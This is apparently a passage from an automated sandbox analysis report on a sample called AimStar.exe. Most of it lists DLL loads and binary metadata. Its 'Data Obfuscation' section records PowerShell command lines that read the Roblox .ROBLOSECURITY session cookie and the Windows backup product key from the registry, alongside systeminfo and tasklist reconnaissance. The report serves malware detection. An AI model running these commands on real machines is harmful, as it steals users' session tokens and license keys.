              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: AimStar.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: AimStar.exeStatic file information: File size 8116372 > 1048576
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: AimStar.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: AimStar.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: AimStar.exe, 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdb source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A85C2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdbhPV source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000058.00000000.2307864420.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2424223799.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423338250.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421608946.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: AimStar.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423964051.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423705275.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422349344.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422715924.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421997867.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp
              Source: AimStar.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: AimStar.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: AimStar.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: AimStar.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: AimStar.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
